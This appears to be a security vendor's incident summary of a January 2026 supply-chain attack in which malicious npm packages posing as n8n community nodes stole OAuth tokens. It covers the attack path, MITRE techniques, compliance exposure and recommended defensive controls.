Executive Summary
In early January 2026, threat actors targeted the n8n workflow automation ecosystem by publishing eight malicious npm packages that mimicked legitimate integrations. These packages prompted unsuspecting users to connect OAuth-protected services like Google Ads, Stripe, and Salesforce. Once installed as community nodes, the malware exfiltrated encrypted OAuth tokens from the n8n credential store by decrypting them with n8n's own master key and sending them to attacker-controlled servers. The campaign exploited developer trust in community packages and highlighted a dangerous new avenue for credential theft at scale.
This incident reflects the increasing sophistication and frequency of supply chain attacks, particularly against workflow automation tools that centralize sensitive credentials. With open-source ecosystems growing rapidly, businesses face heightened urgency to scrutinize third-party integrations and adopt least-privilege, zero trust security practices.
Why This Matters Now
The ongoing risks associated with open community integrations and the lack of adequate sandboxing in automation platforms significantly expand organizational attack surfaces. As attackers increasingly exploit software supply chains and credential vaults, the speed at which malicious code can be propagated and sensitive data exfiltrated has never been higher, demanding urgent supply chain governance.
Attack Path Analysis
Attackers initiated the compromise by publishing malicious npm community node packages that masqueraded as legitimate n8n integrations and were installed by unsuspecting users. These packages exploited n8n workflow privileges to access stored OAuth tokens without requiring additional privilege escalation. Once installed, the malicious code executed with n8n-level access, enabling lateral movement across workflows and connected services. The malware established command and control by exfiltrating decrypted credentials to external servers using outbound network access. Exfiltration of sensitive OAuth tokens was done covertly during workflow execution to attacker-controlled infrastructure. The impact was theft of credentials, potential secondary access to integrated services, and compromise of business processes.
Kill Chain Progression
Initial Compromise
Description
Malicious npm packages posing as trusted n8n community nodes were published and installed by developers, introducing attacker-controlled code into victim workflows.
Related CVEs
CVE-2026-21877
CVSS 10An authenticated user may be able to execute untrusted code, potentially leading to full compromise of the affected n8n instance.
Affected Products:
n8n n8n – < 1.0.0
Exploit Status:
exploited in the wild
MITRE ATT&CK® Techniques
Supply Chain Compromise: Compromise Software Dependencies and Development Tools
Command and Scripting Interpreter
Credentials from Password Stores
Unsecured Credentials: Credentials In Files
Man-in-the-Middle
Exfiltration Over C2 Channel
Impair Defenses: Disable or Modify Tools
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – User Identification and Authentication Controls
Control ID: 8.2.1
NYDFS 23 NYCRR 500 – Cybersecurity Program
Control ID: 500.02
DORA (EU Digital Operational Resilience Act) – ICT Risk Management Framework
Control ID: Article 6
CISA ZTMM 2.0 – Protect all Credentials (including secrets, tokens, and API keys)
Control ID: Identity Pillar - Credential Protection
NIS2 Directive – Supply Chain Security
Control ID: Article 21(2)d
ISO/IEC 27001:2022 – Addressing Security in Supplier Agreements
Control ID: A.14.1.2
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Computer Software/Engineering
Supply chain attacks targeting workflow automation platforms expose OAuth tokens and API keys, compromising development environments and integrated services authentication mechanisms.
Information Technology/IT
Malicious npm packages exploiting n8n community nodes create credential vault breaches, enabling lateral movement across cloud services and automation infrastructure deployments.
Marketing/Advertising/Sales
Google Ads OAuth credential theft through fake n8n integrations compromises advertising campaign data and customer insights stored in workflow automation platforms.
Financial Services
Credential harvesting from automation platforms threatens Stripe payment processing tokens and financial API keys, enabling unauthorized transaction access and data exfiltration.
Sources
- n8n Supply Chain Attack Abuses Community Nodes to Steal OAuth Tokenshttps://thehackernews.com/2026/01/n8n-supply-chain-attack-abuses.htmlVerified
- Risks when using community nodeshttps://docs.n8n.io/integrations/community-nodes/risks/Verified
- Malicious npm packages target the n8n automation platform in a supply chain attackhttps://www.csoonline.com/article/4115417/malicious-npm-packages-target-n8n-automation-platform-in-a-supply-chain-attack.htmlVerified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
CNSF-aligned controls such as zero trust segmentation, east-west traffic inspection, and tight egress policy enforcement would have restricted the malicious node's ability to move laterally, access sensitive credentials, and exfiltrate stolen tokens. Real-time threat detection and workload segmentation could have exposed and mitigated unauthorized outbound actions or anomalous credential access within developer environments.
Control: Zero Trust Segmentation
Mitigation: Prevented installation and execution of unauthorized third-party code in sensitive workflow environments.
Control: East-West Traffic Security
Mitigation: Detected and contained unauthorized access to credential stores or sensitive inter-workload communication.
Control: Kubernetes Security (AKF)
Mitigation: Prevented unauthorized pod-to-pod or namespace lateral movement within workflow hosting clusters.
Control: Egress Security & Policy Enforcement
Mitigation: Terminated or alerted on unauthorized outbound connection attempts to unapproved destinations.
Control: Cloud Firewall (ACF)
Mitigation: Detected and blocked anomalous data exfiltration from workflow instances.
Rapidly detected anomalous credential access and workflow behavior, reducing dwell time and damage.
Impact at a Glance
Affected Business Functions
- Workflow Automation
- Data Integration
Estimated downtime: 3 days
Estimated loss: $50,000
Potential exposure of OAuth tokens and API keys for integrated services like Google Ads, Stripe, and Salesforce, leading to unauthorized access and data breaches.
Recommended Actions
Key Takeaways & Next Steps
- • Enforce zero trust segmentation to ensure third-party packages and community nodes operate with the minimum privileges and access boundaries in workflow automation platforms.
- • Implement strict egress security controls (FQDN/IP filtering) at the network and application layer to block unauthorized outbound access from automation and CI/CD services.
- • Deploy real-time threat detection and anomalous behavior monitoring to identify suspicious credential access and workflow execution patterns.
- • Apply Kubernetes and pod-level segmentation to prevent malicious workloads from laterally accessing unrelated application namespaces and service identities.
- • Enforce continuous visibility and centralized policy control across multi-cloud and hybrid deployments to promptly detect and contain supply chain threats.
